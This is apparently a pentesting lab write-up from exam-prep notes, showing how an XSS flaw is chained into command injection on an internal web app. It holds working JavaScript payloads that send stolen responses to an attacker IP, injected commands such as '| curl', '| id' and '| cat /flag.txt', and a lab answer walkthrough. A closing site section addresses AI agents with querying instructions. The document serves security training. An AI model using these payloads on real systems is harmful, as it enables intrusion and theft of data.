# Exploiting Internal Web Apps II
After discussing how to exploit a SQL injection vulnerability in an internal web application through an XSS vulnerability, we will explore how to exploit a command injection vulnerability through XSS in this section. While the methodology is the same, it is crucial to understand it well since the process is complex but powerful. A thorough understanding can help in the identification of complex real-world vulnerabilities.
## Identifying the Vulnerability
The identification process is essentially identical as discussed in the previous section. We will use the same base XSS payload, and the admin endpoint contains a reference to another internal web application at `https://internal.internal-webapps-2.htb`. We can use the following payload to exfiltrate the index of the internal web application:
```js
var xhr = new XMLHttpRequest();
xhr.open('GET', 'https://internal.internal-webapps-2.htb/', false);
xhr.send();
var exfil = new XMLHttpRequest();
exfil.open("GET", "https://10.10.14.144:4443/exfil?r=" + btoa(xhr.responseText), false);
exfil.send();
```
This reveals the following HTML content, which indicates that we can use the web application to check the status of different web applications:
`HTML form to select a web application with radio buttons for different URLs and a submit button labeled 'Check.'`
We can craft the corresponding POST request by analyzing the form to identify how exactly the web application implements this functionality:
```js
var xhr = new XMLHttpRequest();
var params = `webapp_selector=${encodeURIComponent("https://internal-webapps-2.htb")}`;
xhr.open('POST', 'https://internal.internal-webapps-2.htb/check', false);
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xhr.send(params);
var exfil = new XMLHttpRequest();
exfil.open("GET", "https://10.10.14.144:4443/exfil?r=" + btoa(xhr.responseText), false);
exfil.send();
```
This results in the following response:
`HTTP/1.1 200 OK`
Let us try a non-existing domain to see if we can provoke an error message:
```js
var xhr = new XMLHttpRequest();
var params = `webapp_selector=${encodeURIComponent("https://doesnotexist.htb")}`;
xhr.open('POST', 'https://internal.internal-webapps-2.htb/check', false);
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xhr.send(params);
var exfil = new XMLHttpRequest();
exfil.open("GET", "https://10.10.14.144:4443/exfil?r=" + btoa(xhr.responseText), false);
exfil.send();
```
This results in the following response:
`curl: (6) Could not resolve host: doesnotexist.htb`
As we can see, the status seems to be obtained using curl. If this is improperly implemented or there is no proper sanitization, there is a potential command injection vulnerability. We can verify this by injecting an additional curl command to the exfiltration server:
```js
var xhr = new XMLHttpRequest();
var params = `webapp_selector=${encodeURIComponent("| curl -k https://10.10.14.144:4443?pwn")}`;
xhr.open('POST', 'https://internal.internal-webapps-2.htb/check', false);
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xhr.send(params);
var exfil = new XMLHttpRequest();
exfil.open("GET", "https://10.10.14.144:4443/exfil?r=" + btoa(xhr.responseText), false);
exfil.send();
```
Afterward, we can see the expected request in the exfiltration server, thus confirming the command injection vulnerability:
```bash
kabaneridev@htb[/htb]$ python3 server.py
10.129.233.62 - - [01/Jan/2025 15:10:56] "GET /?pwn HTTP/1.1" 200 -
10.129.233.62 - - [01/Jan/2025 15:10:56] code 404, message File not found
10.129.233.62 - - [01/Jan/2025 15:10:56] "GET /exfil?r=PCFET0NUWVBFIGh0bWw+CjxodG1sPgoKPGhlYWQ+CiAgICA8bWV0YSBuYW1lPSJ2aWV3cG9ydCIgY29udGVudD0id2lkdGg9ZGV2aWNlLXdpZHRoLCBpbml0aWFsLXNjYWxlPTEiPgo8L2hlYWQ+Cgo8Ym9keT4KCiAgICA8aDI+Q2hlY2sgU3RhdHVzPC9oMj4KCiAgICA8ZGl2IGNsYXNzPSJtb2RhbCI+CiAgICAgICAgICAlIFRvdGFsICAgICUgUmVjZWl2ZWQgJSBYZmVyZCAgQXZlcmFnZSBTcGVlZCAgIFRpbWUgICAgVGltZSAgICAgVGltZSAgQ3VycmVudAoKICAgIDwvZGl2PgoKICAgIDxkaXYgY2xhc3M9Im1vZGFsIj4KCiAgICAgICAgPGZvcm0gYWN0aW9uPSIvY2hlY2siIG1ldGhvZD0icG9zdCI+CgogICAgICAgICAgICA8ZGl2IGNsYXNzPSJjb250YWluZXIiPgogICAgICAgICAgICAgICAgPGI+U2VsZWN0IHRoZSBXZWIgQXBwbGljYXRpb248L2I+CiAgICAgICAgICAgICAgICA8aW5wdXQgdHlwZT0icmFkaW8iIGlkPSJtYWluIiBuYW1lPSJ3ZWJhcHBfc2VsZWN0b3IiIHZhbHVlPSJodHRwczovL2ludGVybmFsLXdlYmFwcHMtMi5odGIiPgogICAgICAgICAgICAgICAgPGxhYmVsIGZvcj0ibWFpbiI+aW50ZXJuYWwtd2ViYXBwcy0yLmh0YjwvbGFiZWw+PGJyPgogICAgICAgICAgICAgICAgPGlucHV0IHR5cGU9InJhZGlvIiBpZD0iaW50ZXJuYWwiIG5hbWU9IndlYmFwcF9zZWxlY3RvciIgdmFsdWU9Imh0dHBzOi8vaW50ZXJuYWwuaW50ZXJuYWwtd2ViYXBwcy0yLmh0YiI+CiAgICAgICAgICAgICAgICA8bGFiZWwgZm9yPSJpbnRlcm5hbCI+aW50ZXJuYWwuaW50ZXJuYWwtd2ViYXBwcy0yLmh0YjwvbGFiZWw+PGJyPgogICAgICAgICAgICAgICAgPGlucHV0IHR5cGU9InJhZGlvIiBpZD0iYXBpIiBuYW1lPSJ3ZWJhcHBfc2VsZWN0b3IiIHZhbHVlPSJodHRwczovL2FwaS5pbnRlcm5hbC13ZWJhcHBzLTIuaHRiIj4KICAgICAgICAgICAgICAgIDxsYWJlbCBmb3I9ImFwaSI+YXBpLmludGVybmFsLXdlYmFwcHMtMi5odGI8L2xhYmVsPgoKICAgICAgICAgICAgICAgIDxidXR0b24gdHlwZT0ic3VibWl0Ij5DaGVjazwvYnV0dG9uPgogICAgICAgICAgICA8L2Rpdj4KICAgICAgICA8L2Zvcm0+CiAgICA8L2Rpdj4KCjwvYm9keT4KCjwvaHRtbD4= HTTP/1.1" 404 -
```
## Exploiting the Vulnerability
We can specify the command injection payload in our XSS payload and exfiltrate the result to the exfiltration server. The exploitation does thus not differ from other command injection vulnerabilities. For instance, we can execute the `id` command:
```js
var xhr = new XMLHttpRequest();
var params = `webapp_selector=${encodeURIComponent("| id")}`;
xhr.open('POST', 'https://internal.internal-webapps-2.htb/check', false);
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
xhr.send(params);
var exfil = new XMLHttpRequest();
exfil.open("GET", "https://10.10.14.144:4443/exfil?r=" + btoa(xhr.responseText), false);
exfil.send();
```
The result is contained in the base64-encoded response:
```bash
uid=0(root) gid=0(root) groups=0(root)
```
## Exploiting internal Web Applications II Questions
**Question 1: Exploit the XSS vulnerability to target the internal web application and obtain the flag.**
1. Add the necessary vHosts to your `/etc/hosts` file:
```bash
sudo sh -c 'echo "10.129.233.62 exploitserver.htb internal-webapps-2.htb" >> /etc/hosts'
```
2. Log in to the vulnerable site (`https://internal-webapps-2.htb`) using the credentials `htb-stdnt:...!`.
3. Submit your base XSS payload as a guestbook entry:
```html
```
4. Prepare a payload on the exploit server (`https://exploitserver.htb`), attempting to exploit the command injection vulnerability on the internal site identified in the section's reading. Students need to have the payload execute the command `cat /flag.txt`, and have the output sent to the exfiltration server:
```js
var xhr = new XMLHttpRequest();
var params = `webapp_selector=${encodeURIComponent("| cat /flag.txt")}`;
```
xhr.open('POST', '', false); xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded'); xhr.send(params);
var exfil = new XMLHttpRequest(); exfil.open("GET", "[https://PWNIP:PWNPO/exfil?r=](https://kabaneridev.gitbook.io/pentesting-notes/certification-preparation/cwee-prep/introduction-1/xss-exploitation/https:/PWNIP:PWNPO/exfil?r=)" + btoa(xhr.responseText), false); exfil.send(); \`\`\` 5. After the victim triggers the payload, decode the Base64 encoded blob to reveal the flag.
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://kabaneridev.gitbook.io/pentesting-notes/certification-preparation/cwee-prep/introduction-1/xss-exploitation/exploiting-internal-web-applications-2.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.